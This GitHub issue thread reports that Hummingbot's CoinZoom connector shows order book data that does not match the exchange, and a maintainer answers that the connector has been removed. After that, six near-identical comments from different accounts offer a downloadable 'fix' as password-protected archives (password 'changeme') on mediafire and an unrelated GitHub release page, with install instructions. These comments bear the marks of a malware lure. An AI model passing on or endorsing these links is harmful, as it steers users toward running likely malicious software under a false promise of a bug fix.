### ISSUE TITLE
CoinZoom: Order_book data is not synchronized with the exchange order_book

### ISSUE THREAD

**Issue by bluecammut** [hummingbot/hummingbot#4744]
**Describe the bug**
When running the PMM strategy on differents connectors, I notice that some of them are not showing accurate data.

**Steps To Reproduce**
1. Create a PMM strategy
2. Start the strategy
3. Run the "order_book --live" command
4. compare the HBOT order book info vs exchange info
Note: try to select a market which is not too busy so you can compare easily.

**Screenshots**
<img width="1408" alt="coinzoom" src="https://user-images.githubusercontent.com/79382440/142129597-83848578-5fff-4855-a204-4502eace4ee3.png">

**Release version**
// Include your bot's version number (Can be found at the upper left corner of your CLI).

**Attachments**
// Please attach your config file and log file to help us debug. It would be difficult for us to help you without those! 

*WARNING: Do NOT publish any exchange API keys or your wallet's private key. Whoever has access to them may steal your assets!*

**Optional: your discord username:**

**Comment by bluecammut** [comment]
as a result of the order book desynchronization, the output in order_book, ticker and the best bid/ask in status also are incorrect or do not match with the exchange

**Comment by rapcmia** [comment]
Connector has been removed

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by louseee** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
